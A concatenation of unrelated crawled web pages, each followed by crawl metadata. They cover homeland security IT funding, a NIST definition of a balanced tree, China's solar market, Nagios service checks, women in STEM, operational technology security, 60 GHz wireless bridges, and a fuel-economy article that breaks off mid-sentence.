awareness are essential, and so public-sector information professionals must then enter the fray." Marcus Sachs, deputy director of the DHS's Cyber Security Research and Development Center at SRI International and former White House staff member on the National Security Council, agrees. "The underpinning of our economy is electronic," he said. "Disruption to this system will make ripples in the physical world. Since the 9/11 attacks, the national reaction has been more a physical response. An electronic attack could be just as devastating as a biochemical attack. A cyber-attack on a computer network that runs the physical networks would disrupt the physical structure and cause a cascade effect." Nonetheless, misperception that homeland security funds are primarily to be used for fighting what is widely understood as terrorism has been widespread. "Obviously those tools are important, but we have other things to contend with, such as animal and human safety during the aftermath of a disaster of any kind -- bio-terrorism, natural disasters, you name it," observed Denise Moore, chief information technology officer of Kansas, and chair of the executive committee of the National Association of State Chief Information Officers (NASCIO). "These risks are different, but nevertheless very important." In the years and months since 9/11 and Hurricane Katrina, perception has grown that collaboration in IT is essential to physical preparedness. "Every government uses IT equipment in some way, and it must be used during any crisis or disaster," Moore said. "There is always a technology component behind every agency, and that has been very important to this whole effort. As an IT community we have to be alert and aware of any possible attacks on communications. We've been in a good position through NASCIO, through information sharing and interaction to hear what is happening with the states. As an example, the numbers vary from state to state, but thousands of cyber-attacks take place every day on state networks." Seattle Seeds IT Security Some areas have been leaders in the drive to use IT to achieve homeland security goals. Seattle's 2003 simulation of a dirty bomb attack involved most governments in western Washington, and measured regional and federal response. An unpublicized component was a simulated attack by hackers on government networks and radio, and computer communications systems -- all essential for conveying information among agencies and to citizens. "This was the seed event we used in developing programs and seeking funding for cyber-security in our urban areas," said Bill Schrier, Seattle's chief technology officer. "Cyber-security is one piece of how we've spent the money on information technology. One of the pieces of software we acquired from homeland security funds protected us from the recent Microsoft browser virus," said Schrier. "We had 20 to 50 hits a day infected with this virus, but $100,000 in software we acquired protected us. This demonstrated one of the ways we used the funds to actually protect city government. Last year we didn't have a single outbreak of a virus or worm in city government." Schrier added that the public safety communications network in the county was dated prior to 9/11. Also, the radio communications interoperability networking police, firefighters and other emergency services were funded by several sources, including Washington state. "With new Seattle area homeland security funds, we have integrated services with other counties and the state of Washington," he said. Some state and local governments have been using homeland security funds for IT initiatives, and will continue to do so. But as more jump on the bandwagon, they are being called upon to demonstrate just how they will use that money. Onus on the Protected Previously the DHS Office for Domestic Preparedness (ODP) established guidelines for distribution of money to states. States then followed those guidelines and tied their projects to ODP risk categories. For example, Kansas set up a prevention goal in its guidelines for protecting all critical state-owned facilities from weapons of mass destruction. "Our DHS-funded project allowed for a totally recoverable data center that keeps all critical applications and data systems running in the event of a disaster," said Moore. Kansas is no exception. Transparent spending and accountability on all governmental levels have been common, despite memorable news reports of homeland security purchases such as snake tongs, bulletproof vests for all professional canines and polo shirts. For example, the committee that reviewed grants in Virginia is very strict about the projects as they relate to homeland security, noted Virginia CIO Lemuel Stewart. "I would be surprised if anything unrelated got through," he said. The DHS, however, decided more transparency was needed; hence, a more rigorous application process for money. Under the new arrangement, applicants must detail how funding will be spent; why a purchase supports the homeland security mission in their town, county or state; and even detail management or oversight initiatives for the projects they wish to fund. The urban grant program now requires evidence of regional aid cooperation in the form of mutual aid agreements across jurisdictions, regional planning structures, training and preparedness efforts, and IT collaboration across government levels. Since 9/11, homeland security funds allocated across the states have typically been focused on first responder equipment, or "boots and trucks," in the words of Stewart. Some think that funding only scraped the surface of IT and training needs in the last two fiscal years, especially in large cities. "Our biggest frustration has been that they have funded equipment, not people," said Jane Campbell, former mayor of Cincinnati. Indeed, the formula's changes have been ongoing. Homeland security funding numbers for urban areas have varied annually. When DHS first began to allocate funds for at-risk areas, it identified seven cities as the most vulnerable: New York; Washington, D.C.; Los Angeles; Seattle; Chicago; San Francisco; and Houston. The Urban Areas Security Initiative (UASI) subsequently expanded to 50 cities, but later contracted to 35 metropolitan areas. Now officials in remaining areas must apply for funding and demonstrate how those funds will be used. Some cities previously designated high-risk were removed from the fiscal 2006 list, and given a one-year grace period for transition and to reapply. Las Vegas and San Diego were among the cities on the list of ineligibles, a decision that raised questions from government officials in both cities. California Gov. Arnold Schwarzenegger publicly expressed concern about the new risk-based funding assessments now required by the DHS, noting that high-security military installations in San Diego had been overlooked. Meeting New Requirements There is no question that DHS Secretary Michael Chertoff's new funding requirements are more bureaucratic and require top-down approval of how money will be spent at each level. Previously local governments had more freedom to channel the uses of money from funds received. For instance, agencies in the Seattle area decided which areawide projects would be funded and the specific amount to be allocated to Seattle. Cyber-security expenses typically came directly from city UASI funds, said Schrier. Now jurisdictions are expected to meet these new requirements as a condition of receiving federal preparedness funding assistance. States are still responsible for distributing federal funds for non-UASI programs to localities. Each state has an administrative agency responsible for application and distribution of funds. Some funding may be provided to counties for further distribution. The process, although paperwork-heavy, may have potential for greater efficiency. Before 2006, grant funds had to be drawn down in a few days. "This process proved to be disorganized and created a delay in disbursing funding to localities and sometimes prevented disbursement of funds entirely," said Deepak Bhat, state and local manager at INPUT, a market intelligence research firm in Reston, Va. "Grantees are permitted to draw down funds up to 120 days prior to expenditure." That way, states and localities don't have to front costs and use federal funds. "Distributing funding based on general characteristics did not hold recipients accountable for how monies were spent, it only determined who might need DHS assistance. There was no assurance the funding would be spent on homeland security-related equipment or services," said Bhat. "Under the new arrangement, applicants must detail how funding will be spent, provide justification for funding, and even detail management or oversight initiatives for the projects they wish to fund." For some areas, it may be physical security, or more equipment for first responding, said Sachs of SRI International. "It was previously up to the localities, and now is an interesting windfall with a lot of strings attached," he said. One possible advantage of this new risk assessment is that it encourages more regional coalescence of IT resources. "Of course we will be seeking more funds, but knowing strength comes from collaboration, we'll work to secure funds that can be used regionally," said Virginia CIO Stewart. Many states have been working toward a regional focus that streamlines emergency response systems and increases interoperability. Virginia, the first state to have a statewide interoperability plan, has had a statewide effort with creating IT services in the event of disaster, said Stewart. "We've achieved this in 85 percent of agencies thus far, fusing local, state and county governments," he said. Virginia's regional emergency service center, located in Roanoke, serves multiple counties. Solutions shown as used regionally for legitimate risks may be perceived as more effective. "The applicant that best demonstrates catastrophic loss of life or catastrophic economic loss stands a better chance at winning grant money than one that does not," according to a report by INPUT. What George Foresman, who was recently appointed as the DHS's first Undersecretary for Preparedness, calls a "robust risk formula that considers three primary variables: consequence, vulnerability and threat" has inspired myriad reactions. James Jay Carafano of the Washington, D.C.-based Heritage Foundation said the new guidelines are a step in the right direction, and have transformed the grant program into an effective security tool. Some believe the DHS has not been doing enough to fulfill its obligation to initiate nationwide cyber-security. Reports from NASCIO, House Democrats and the Government Accountability Office all noted the department should be doing more to work with the public and private sectors. Moore pointed out that NASCIO advocated incorporating the cyber-security element and making it integral to the whole homeland security process. "We have met with legislators and expressed our concern," she said. "The new grant process now has a component for cyber-security, and it's more defined than in the past, more comprehensive, and states are paying more attention to that. We've been pushing to tie data together for better use of cyber-security funds. The new requirements are better for cyber-security because in the past, they did not pay as much attention to it." In late January 2006, the U.S. Conference of Mayors met in Washington, D.C., to vent their frustrations over the changes in federal homeland security initiatives. During their emergency meeting with Chertoff on emergency response and homeland security, they recommended improving communications interoperability. Mayors complained that the new process was rigid, overly complex and difficult to follow by the March 2 deadline. The mayoral group noted a need for urgent front-line funding to address the problem of "limited availability of spectrum for public safety that continues to force first responders to operate on several different and incompatible and congested voice channels," according to a January 26 press statement. The conference conducted its own homeland security funding surveys of the process, and found that money was not reaching the cities quickly. "And when it did, it often came with federal restrictions and rules that made it very difficult to spend on what was needed most." Seattle has received money in all the rounds of funding, but this year the whole methodology is changing, according to Schrier. "It's a pretty fundamental change in how we're going to do business, and will require us to put together how we will use the IT funds ahead of time," he said. Moore said there will probably be more accountability with the program this year. "We don't yet know the effect on our state and the group, but as long as you have a valid need and it's recognized by the homeland security community, you have a good shot." Washington, however, is emphasizing funding that results from better preparation for the inevitable. In the new grant application, evaluators would like to hear more about the process of using the funds, policy issues, and how states and cities decided on their top priorities, said Foresman. "Information-sharing about the process helps us all become better prepared," he said. "We take into account the homeland security needs of each state," Foresman said. "The question is not if something happens. Something will happen. We live with crises in our environment all the time: blackouts, floods, fires and threats to cyber- security. In risk management, there is a difference between treating someone fairly and equally. Our solution is to treat the funding recipients fairly. We'll have to make some tough choices in an atmosphere of transparent coalescence between all levels of government."
<urn:uuid:49e113f0-ccb3-4165-8714-8a4e60c41903>
CC-MAIN-2017-04
http://www.govtech.com/magazines/pcio/Funding-Frustrations.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279176.20/warc/CC-MAIN-20170116095119-00095-ip-10-171-10-70.ec2.internal.warc.gz
en
0.964929
3,118
2.59375
3
Definition: A tree where no leaf is much farther away from the root than any other leaf. Different balancing schemes allow different definitions of "much farther" and different amounts of work to keep them balanced. Generalization (I am a kind of ...) Specialization (... is a kind of me.) BB(α) tree, height-balanced tree, B-tree, AVL tree, full binary tree, red-black tree. See also balance, relaxed balance. Usually "balanced" means "height balanced". Called an "admissible tree" by Adelson-Velskii and Landis. [Knuth98, 3:459, Sect. 6.2.3] If you have suggestions, corrections, or comments, please get in touch with Paul Black. Entry modified 14 August 2008. HTML page formatted Mon Feb 2 13:10:39 2015. Cite this as: Paul E. Black, "balanced tree", in Dictionary of Algorithms and Data Structures [online], Vreda Pieterse and Paul E. Black, eds. 14 August 2008. (accessed TODAY) Available from: http://www.nist.gov/dads/HTML/balancedtree.html
<urn:uuid:3cfb437a-46a4-44e6-91d0-8639e9f10ae2>
CC-MAIN-2017-04
http://www.darkridge.com/~jpr5/mirror/dads/HTML/balancedtree.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280801.0/warc/CC-MAIN-20170116095120-00241-ip-10-171-10-70.ec2.internal.warc.gz
en
0.866215
262
2.828125
3
China is the global leader of Photovoltaic cell production in the world. China installed 12 GW of new photovoltaic (PV) generation capacity in 2013, a massive 232 percent increase over the previous year. According to the China’s National Energy Administration (NEA), more than 5GW of solar capacity was added in the first quarter of 2015, more than in the first two quarters of 2014 combined. The Global annual solar power production is estimated to reach 500GW by 2020, from 40.134 GW in 2014, making this market one of the fastest growing one. The China Solar Power Market is estimated to reach $XX billion in 2020 with a CAGR of 9.1% from 2014 to 2020. With fossil fuel prices fluctuating continuously and disasters like Fukushima and Chernobyl raising serious questions about nuclear power, renewable sources of energy are the answer to the world’s growing need for power. Hydro Power has environmental concerns so apart from water the other renewable source of energy in abundance is Solar. The Earth receives 174 petawatts of solar energy every year. It is the largest energy source on the Earth. Other resources like oil and gas, water, coal etc. require lot of effort and steps to produce electricity, solar energy farms can be established easily which can harness electricity and the electricity produced is simply given to the grid. Falling costs; stable policy and regulation; downstream innovation and expansion; and various incentive schemes for the use of renewable energy for power generation are driving the solar power market at an exponential rate. On the flipside, high initial investment, intermittent energy Source, and requirement of large installation area to setup solar farms are restraining the market from growth. In the recent years, lot of research is going on in this field to make production easier, cheaper and also to make the solar panels smaller and more customer friendly. Lot of efforts are being put into increase the efficiency of solar panels which used to have a very meagre efficiency percentage. Different techniques like Nano-crystalline solar cells, thin film processing, metamorphic multijunction solar cell, polymer processing and many more will aid the future of this industry. This report comprehensively analyzes the China Solar Power Market by segmenting it based on type (Concentrating type, Non Concentrating type, Fixed Array, Single Axis Tracker, and Dual Axis Tracker) and by Materials (Crystalline Silicon, Thin Film, Multijunction Cell, Adaptive Cell, Nano crystalline, and others). Estimates in each segment are provided for the next five years. Key drivers and restraints that are affecting the growth of this market were discussed in detail. The study also elucidates on the competitive landscape and key market players.
<urn:uuid:69a07652-5ac9-4896-87b0-7d0331d23f91>
CC-MAIN-2017-04
https://www.mordorintelligence.com/industry-reports/china-solar-power-market-industry
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280133.2/warc/CC-MAIN-20170116095120-00269-ip-10-171-10-70.ec2.internal.warc.gz
en
0.939482
554
2.9375
3
Up To: Contents See Also: Active Checks, Host Checks, Check Scheduling, Predictive Dependency Checks The basic workings of service checks are described here... When Are Service Checks Performed? Services are checked by the Nagios daemon: On-demand checks are performed as part of the predictive service dependency check logic. These checks help ensure that the dependency logic is as accurate as possible. If you don't make use of service dependencies, Nagios won't perform any on-demand service checks. Cached Service Checks The performance of on-demand service checks can be significantly improved by implementing the use of cached checks, which allow Nagios to forgo executing a service check if it determines a relatively recent check result will do instead. Cached checks will only provide a performance increase if you are making use of service dependencies. More information on cached checks can be found here. Dependencies and Checks You can define service execution dependencies that prevent Nagios from checking the status of a service depending on the state of one or more other services. More information on dependencies can be found here. Parallelization of Service Checks Scheduled service checks are run in parallel. When Nagios needs to run a scheduled service check, it will initiate the service check and then return to doing other work (running host checks, etc). The service check runs in a child process that was fork()ed from the main Nagios daemon. When the service check has completed, the child process will inform the main Nagios process (its parent) of the check results. The main Nagios process then handles the check results and takes appropriate action (running event handlers, sending notifications, etc.). On-demand service checks are also run in parallel if needed. As mentioned earlier, Nagios can forgo the actual execution of an on-demand service check if it can use the cached results from a relatively recent service check. Services that are checked can be in one of four different states: Service State Determination Service checks are performed by plugins, which can return a state of OK, WARNING, UNKNOWN, or CRITICAL. These plugin states directly translate to service states. For example, a plugin which returns a WARNING state will cause a service to have a WARNING state. Services State Changes When Nagios checks the status of services, it will be able to detect when a service changes between OK, WARNING, UNKNOWN, and CRITICAL states and take appropriate action. These state changes result in different state types (HARD or SOFT), which can trigger event handlers to be run and notifications to be sent out. Service state changes can also trigger on-demand host checks. Detecting and dealing with state changes is what Nagios is all about. When services change state too frequently they are considered to be "flapping". Nagios can detect when services start flapping, and can suppress notifications until flapping stops and the service's state stabilizes. More information on the flap detection logic can be found here.
<urn:uuid:280109be-96a1-4000-a07c-d520332f671e>
CC-MAIN-2017-04
https://assets.nagios.com/downloads/nagioscore/docs/nagioscore/3/en/servicechecks.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280485.79/warc/CC-MAIN-20170116095120-00177-ip-10-171-10-70.ec2.internal.warc.gz
en
0.886157
619
2.515625
3
It wasn't until Christianne M. Corbett began working as an industrial designer that she gave serious thought to the lack of women in computing and engineering. The desire to explore the underlying reasons for the underrepresentation of women in these fields was fueled by her master's degree in cultural anthropology, prompting her to pursue a Ph.D. in sociology in an effort to get to the bottom of these issues. Corbett, American Association of University Women (AAUW) senior researcher and Catherine Hill, AAUW vice president of research, co-authored a paper based on their findings, titled "Solving the Equation: The Variables for Women's Success in Engineering and Computing," which Corbett discussed at a session at last month's Grace Hopper Celebration of Women in Computing conference. Not surprisingly, the research revealed that women remain drastically underrepresented in the fields of engineering and computing, but Corbett's research also highlighted best practices and recommendations for increasing the proportion of women in STEM fields. "We not only wanted to know why there are so few women in STEM, we wanted to actively work to find out what can be done to address this. Women make up approximately 26 percent of computing professionals; Black women are just 3 percent and Hispanic women are just 1 percent. It'd be one thing if these numbers accurately reflected women's representation in society as a whole, but they don't. Women are about half of the overall population -- so these numbers are only about half what they should be," says Corbett. Prime the pipeline Significant efforts have been made to increase the pipeline of women in high school and college and to encourage them to pursue STEM careers, but that's not enough, says Corbett. In 2010 alone, the U.S. spent $3.4 billion in federal funds to address Science, Technology, Engineering and Math (STEM) education talent shortages, and to help improve representation of women and people of color in these fields. Programs like Girls Who Code are also trying to address the underrepresentation of women in computing through intervention and education-focused initiatives. [ Related Story: 6 reasons your business needs female leadership ] What else can be done? It begins with greater acknowledgement of the problem, Corbett says. "Effective solutions require that we first acknowledge that we're all affected by gender bias. While overt biases have declined, unconscious biases still remain, whether or not we endorse those biases - even women have them about other women," Corbett says. Don't believe it? Check out the Gender Implicit Association Test available from Harvard University to see how ingrained these biases can be, Corbett says. Unconscious gender bias is extremely common, even among those who consciously and vocally reject outward biases and stereotypes, she says. Unconscious biases are not an indication of what you might consciously, logically believe, but are more a reflection of the cultural norms that surrounds us from birth, Corbett says. "As early as first grade, research has shown that students are already making a correlation between 'math' and 'male' and 'verbal' and 'female,' and those implicit biases are only strengthened by the time women enter the workforce," Corbett says. These biases can then impact how women are assessed and evaluated when they're applying for jobs, she says. Change your evaluation and screening processes "Businesses must change their evaluation processes to mitigate the effects of these biases and stereotypes; removing information about gender, race, age and other factors can help make sure hiring decisions are based on objective information -- though you can't remove these for an in-person screening, but it's a start," Corbett says. There also must be an effort to hire and retain women at all levels in the workforce, Corbett says, not just a few here and there. Beware, too, of only positioning one or two women at high levels of the organization so that they aren't approachable or accessible to other women with in the company. "Girls and women have to be able to relate to these other woman as role models and mentors. Positioning female 'superstars' might look and sound good, but it doesn't do much to impact technical biases," Corbett says. Businesses should also focus on how they're testing and screening all applicants to make sure the process is fair to everyone; women in particular can be hindered by "stereotype threat," according to Corbett. Stereotype threat occurs when an individual fears being judged incorrectly because of the group they belong to or identify with, and it has real-world impacts. "When women in academic settings are told about the stereotypes associated with their sex, their test scores drop. That happens in the workplace, as well," she says. [ Related Story: Is your company culture driving away women tech workers? ] Be welcoming and inclusive Beyond the screening and hiring process, businesses should pay attention to subtle cues in their existing work environment that may signal to women that they're not welcome, Corbett says. Male-oriented posters, a "wall of fame" that includes only male employees, even the language used in job postings and in corporate communications can be exclusionary, she says. "Managers also should be held accountable for hiring decisions and making diversity a priority. Sometimes it's easier to fall back on stereotypes when we're trying to do something quickly; 'Oh, I didn't hire her because women aren't as good at math and computing,' isn't something you'd ever say out loud, but that's an unconscious bias thing again. If you're consciously thinking about it, though, you can be more thoughtful and careful in the process," she says. And stick to a zero-tolerance policy for discrimination, Corbett says. Executive leadership must ensure that the entire organization understands that uncivil, discriminatory and biased behavior will not be tolerated, she says. Men within and organization can use their positions and privilege to help the efforts, she says. "Men play an important role here, as allies. Be supportive, be friendly and gender-inclusive. If you see something, or hear something, speak up. If you're in a meeting and realize there aren't any women represented, mention it. Talk about your female colleagues' accomplishments. Actively look for ways to get involved and help," she says. None of these approaches are necessarily new or novel, Corbett says, but taken together, along with advances in attracting more women to the STEM pipeline, can ensure more full representation of women in the workplace. This story, "How to solve the STEM gender equality equation" was originally published by CIO.
<urn:uuid:cbd53f26-3d8d-4ff0-bb62-60261474d5a7>
CC-MAIN-2017-04
http://www.itnews.com/article/3000546/it-skills-training/how-to-solve-the-stem-gender-equality-equation.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00387-ip-10-171-10-70.ec2.internal.warc.gz
en
0.968788
1,352
3.140625
3
In a previous blog, I wrote of the terminology that we use when describing security for the Internet of Things, or IoT (“Getting Past the Word Games to Secure the Internet of Things”). In that blog I also mentioned that I would write about operational technology (OT) security as well. Gartner defines OT in industrial areas as “hardware and software that detects or causes a change, through the direct monitoring and/or control of physical devices, processes and events.” In the world today you see many different examples of OT– industrial control systems (ICS), industrial automation, process control networks (PCN), distributed control systems, and more. You also have seen terms such as SCADA (for “Supervisory Control and Data Acquisition”), a prominent management system for OT. As we’ve written about in blogs in previous years, there is an entire universe of technologies that IT professionals know little about unless they happen to support such environments in enterprises that are involved with OT. There are many of enterprises engaged with OT, from energy and utilities, oil and gas, chemical, manufacturing, transportation to health care, pharmaceuticals, aerospace and defense, and more. In IT, our primary deliverable is information. We use applications, databases, networks and systems to ultimately derive information to make business decisions. Information is also used in OT environments, but the reason Gartner uses the word “operational” in OT is because information is used for other purposes than just decision making. One of the main purposes is to change the “state” of the environment around an OT device, or the state of the OT device itself. OT applications, hardware and networks frequently followed a different development path than IT historically, resulting in platforms and protocols that IT professionals may not recognize except in principle only. The terminology for many of the systems is different, though they may look familiar. The vendors and service providers are frequently different. Many can argue that OT actually came first in the form of mechanical, analog devices dating back to uses in the 19th century, before the advent of general-purpose computers. In any case, we have IT environments and OT environments today in enterprises, managed separately. This also means that we have IT security concerns and OT security concerns frequently addressed by different organizations. The question is, are IT and OT the same, or are there particular differences in the way we secure OT environments? Gartner believes there is an 80/20 rule-of-thumb in the answer: 80% of the security issues faced by OT are almost identical to IT, while 20% are very unique and cannot be ignored. The 80% figure is due in no small part to the adoption of IT technologies by OT over time. Gartner’s definition of OT security is “practices and technologies used to (a) protect people, assets and information, (b) monitor and/or control physical devices, processes and events, and (c) initiate state changes to enterprise OT systems. We believe that there are many aspects of OT security that are the same as IT security, particularly in areas such as the network. We also believe that there are major movements in the industries to use IT security architecture and IT security platforms increasingly in OT environments, as OT infrastructure and applications are gradually upgraded as needed. In a sense, the industries are bringing some of the IT security “sins” of the past into the OT environment. In another sense, there remain unique requirements in OT that will require special approaches to security. We’ll write more about those similarities and differences in a future blog, because they are important. But where does OT security fit (if anywhere) in the discussion about the Internet of Things? Are they one and the same, or is OT something completely different? Even more importantly, should you care? Yes, you should care, and yes, OT and the IoT are related. In a sense, OT is the “first generation” of the IoT, one specifically designed for industrial use, often in long-term deployments, whose endpoints are found in industrial environments, from aircraft to automobiles, from assembly lines to airports. OT and IoT do share many of the same underlying components: sensors, actuators, meters, machine-to-machine communications, and embedded systems. OT historically has mechanical origins for many of its systems (though it is now primarily digital), whereas the IoT is rooted almost entirely in digital architecture. As a decision maker, you should care about OT and IoT similarities and differences because many of your security decisions will be affected by the use of those building components, arranged in different ways for different industrial, commercial and consumer solution scenarios. There will be common vendors in the OT and IoT worlds. There will be mixed OT/IoT scenarios from service providers such as telecommunications and multi-media. OT can be considered a subset of the IoT in the same manner some refer to OT as the “industrial Internet”, or the “industrial IoT”. Just remember that not all security scenarios for OT apply to the IoT and vice versa. Regulatory uncertainty and global concerns about the security of OT systems around the world is fueling the interest in OT security solutions. These concerns are even more urgent than the more nebulous, generalized concerns discussed about securing the IoT, because many OT environments have direct, immediate impacts on people and the environment. OT failures (due to security failures) literally have the capacity to kill or maim and can have severe environmental impact. That is quite different from concerns about the loss of data or even impacts on corporate brand based on compromises of many IT environments. In future blogs we will explore OT security in more detail. If your company is involved in providing OT security or in using OT security systems, Gartner would be interested in hearing from you regarding your products, services and/or experiences. This is particularly true if you are a vendor or service provider intent upon addressing some of the unique 20% differences in OT currently not addressed by IT security products and services. Don’t be a stranger. Category: internet-of-things operational-technology ot-security security Tags: cip critical-infrastructure-protection distributed-control industrial-automation industrial-control internet-of-things iot ot ot-security process-control-networks Comments or opinions expressed on this blog are those of the individual contributors only, and do not necessarily represent the views of Gartner, Inc. or its management. Readers may copy and redistribute blog postings on other blogs, or otherwise for private, non-commercial or journalistic purposes, with attribution to Gartner. This content may not be used for any other purposes in any other formats or media. The content on this blog is provided on an "as-is" basis. Gartner shall not be liable for any damages whatsoever arising out of the content or use of this blog.
<urn:uuid:2548f86f-5287-4c0b-ab41-ce5e41f0686d>
CC-MAIN-2017-04
http://blogs.gartner.com/earl-perkins/2014/03/14/operational-technology-security-focus-on-securing-industrial-control-and-automation-systems/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280746.40/warc/CC-MAIN-20170116095120-00131-ip-10-171-10-70.ec2.internal.warc.gz
en
0.944832
1,423
2.53125
3
60 GHz technology comparison to free-space optics (FSO), 2.4 GHz, 5 GHz, and other lower frequency licensed microwave point-to-point (PTP) wireless bridges for LAN extensions, and other wireless backhaul applications: License-free (in many countries including the US and Canada) 60 GHz radios have unique characteristics that make them significantly different from traditional 2.4 GHz or 5 GHz license-free radios and from licensed-band millimeter-wave radios. These characteristics give 60 GHz radios operational advantages not found in other wireless The FCC allocated an unprecedented 7 GHz of un-channelized spectrum for license-free operation between 57-64 GHz. This compares to less than 0.5 GHz of spectrum allocated between 2-6 GHz for WiFi and other license-free applications. For the first time, sufficient spectrum has been allocated to make possible multi-gigabit Radio Frequency (RF) links. Narrow Beam Antennas The very narrow beam associated with 60 GHz radios enables multiple 60 GHz radios to be installed on the same rooftop or mast, even if they are all operating at the same transmit and receive frequencies. Co-located radios operating in the same transmit and receive frequency ranges can easily be isolated from one another based on small lateral or angular separations and the use of cross-polarized antennas. Easy to Install and Align While the beam width is much narrower than for other license-free and licensed-band radios, it is still wide enough to be accurately aligned by a non-expert installer. Note that these beam widths are much wider than those of free space optic systems, and are not affected by building sway from wind nor tilt from sun heating. Oxygen Absorption and Security Oxygen attenuates 60 GHz signals, a property that is unique to the 60 GHz spectrum. While this limits the distances that 60 GHz links can cover, it also offers interference and security advantages when compared to other wireless technologies. Small beam sizes coupled with oxygen absorption makes these links highly immune to interference from other 60 GHz radios. Another link in the immediate vicinity will not interfere if its path is just slightly different from that of the first link, while oxygen absorption ensures that the signal does not extend far beyond the intended target, even with radios along the exact same trajectory. These same two factors make the signal highly secure. In order to intercept the signal, one would have to locate a receiver lined up on the exact same trajectory, and in the immediate locale of the targeted transmitter. The intercepting receiver would have to be tuned to the carrier signal of the transmitting radio and be in the main beam in order to ensure reception, and the presence of this radio would block/degrade the transmit path of the transmitting radio and jam its receive path. The net result is that the interceptor would be unlikely to actually obtain data from the link and would likely be detected by network administrators. It would typically be easier to dig into conduit and tap into a fiber-optic cable than to find a way to install a rogue receiver to intercept a 60 GHz transmission without being detected. BridgeWave Communications is the leading supplier of 60 GHz gigabit wireless links. BridgeWave's products are the highest performing and the first and only 60 GHz gigabit products below $20,000 for a full link. BridgeWave provides all required mount and installation accessories with the link - all that must be added is the user site fiber and power cabling. The BridgeWave GE60 Wireless Gigabit Ethernet Link is available through leading VARs and wireless distributors worldwide.
<urn:uuid:69c71019-2e7b-46e0-affa-f2bf747ed186>
CC-MAIN-2017-04
http://bridgewave.com/products/tech_overview.cfm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00490-ip-10-171-10-70.ec2.internal.warc.gz
en
0.913409
775
2.703125
3
If one were to guess which year the U.S. auto industry achieved its highest average fuel economy, it would seem safe to assume that the current crop of cars and trucks met that mark. The reality, however, is that it was 24 years ago. In 1987, cars and light trucks on U.S. roads combined to achieve an average of 26.2 mpg. Since then, consumers have become enamored of trucks and SUVs, pushing the average fuel economy lower. But for those keen on seeing fuel economy improve, the future is promising — and mandated. By 2025, automakers must achieve a Corporate Average Fuel Economy (CAFE) of 54.5 mpg, nearly double the current 27.5 mpg requirement. Automakers that fail to meet the CAFE standards will be hit with a penalty of $5.50 for every tenth of a mile they fall short multiplied by the number of vehicles they sell. Conversely automakers can be awarded credits for models that exceed the CAFE standard. Those credits can be used to offset penalties. CAFE is the federal government’s fuel economy standard, conceived as a result of the Arab oil embargo of the early 1970s. The mileage standard does not specify fuel economy for individual vehicles. Instead, it determines the average fuel economy across an automaker’s fleet of cars and light trucks (i.e., pickup trucks, vans and SUVs). The existing CAFE standard was set in 1990, however, legislation signed by former President George W. Bush in 2007 raised the bar to 35 mpg by 2020. In July, the Barack Obama administration went further, revising CAFE to require automakers to achieve 35.5 mpg by 2016 and 54.5 mpg by 2025. There are many questions associated with the 54.5 mpg standard. How will the standard affect car prices? Will there be a measurable impact on the nation’s dependence on foreign oil? What does this mean for electric and hybrid vehicles? But perhaps the most fundamental and compelling question is how will automakers produce a fleet of vehicles that achieve essentially twice the miles per gallon that they do today? It’s the Physics General Motors spokesman Greg Martin started with physics as he aimed to explain how automakers hope to achieve the 54.5 mpg mark. “They are immutable laws,” he said. “That is the beauty of physics.” And Martin, along with virtually everyone else in the industry, said there’s no silver bullet for suspending those immutable laws for automobile engines. Therefore, meeting the 2025 standard won’t happen by way of some heretofore unknown technology or overnight revolution in engine design. Rather, the standard will be met by incremental improvements to existing engine systems. “It is not just going to be one thing, but a compilation of things that will get us there,” Martin said. “Keep in mind that there is also a competing set of regulations that automakers have to comprehend [regarding] safety. All of those safety systems, both active and passive, add weight and mass to the car. This is what makes the industry and business so challenging but fascinating at the same time.” Despite the surge in hybrid vehicles and new all-electric cars like the Nissan Leaf, most industry observers predict that the internal combustion engine has a long life ahead of it. So those engines will need to achieve far better fuel economy than they do today. Sandeep Sovani, the resident auto expert at engineering simulation software firm Ansys, said there are two components to boosting fuel economy for internal combustion engines: increasing their efficiency and reducing their need for fuel. Efficiency gains will come from greater use of turbocharging and systems that shut down some of an engine’s cylinders when they’re unneeded, Sovani said, along with vastly improved transmission technology. To cut energy requirements, and therefore reduce the need for fuel, automakers will pay more attention to aerodynamics and weight reduction. “Over the next 10 years or so, aluminum content in the car is going to increase significantly while steel content is going to shrink,” he said. “And composite materials can be used in many places instead of metal.” In November, Bosch Corp. invited members of the media to the Power of Innovation event at the company’s Plymouth, Mich., engineering, research and development facility. Bosch, a German multinational engineering and electronics company, makes everything from cordless drills to washing machines. But Bosch’s primary products are automotive components, which the company designs and sells to most major auto manufacturers. At the event, engineers and executives from the company explained how automakers will meet the stricter CAFE requirements. By 2020, Bosch CEO Peter Marks said there will be a market for 103 million new vehicles, but only 9 million of those will be hybrids or all-electric. Consequently automakers will rely largely on innovation in the design of gas and diesel engines. “Getting to 54.5 mpg must be done using a proper mix of technologies,” Marks said. “It requires us to look holistically at vehicle improvements,” adding that Bosch “engineers are excited by the untapped potential of technology” to meet the standard. Bosch engineers explained the various elements of an automobile that they and others are working on to improve performance. None of these components in particular will lead to dramatically higher fuel economy, but when operated in concert, these elements should yield a corporate average fuel economy of 54.5 mpg or more. Gasoline Direct Injection (GDI): Many manufacturers, including Bosch, are investing in this technology. In a traditional gasoline engine, fuel and air are mixed in the intake manifold prior to being injected into the cylinder, where it is ignited by a spark plug. The explosion forces the piston downward, thus generating power. In a GDI system, a computer-controlled, high-pressure injector dictates the precise amount of fuel to inject directly into the cylinder. The timing and spray pattern of the fuel injection are also computer-controlled, resulting in a more complete burn than can be achieved in existing engines. The more efficiently fuel is burned, the better the engine’s fuel economy. The cost and complexity of GDI systems have kept the technology from becoming common, but CAFE seems poised to make GDI standard in the coming years. Turbochargers: These have long been viewed as options for car owners who are speed and performance enthusiasts. But increasingly, they are getting a second look as a way to make small engines perform like big ones while maintaining high fuel efficiency. Turbochargers work by using exhaust gases to power a compressor that delivers more air to the engine, which in turn generates more power and better fuel efficiency from an otherwise normal engine. The Ford EcoBoost engine, for example, combines a turbocharger with GDI to deliver up to 20 percent better fuel economy and up to 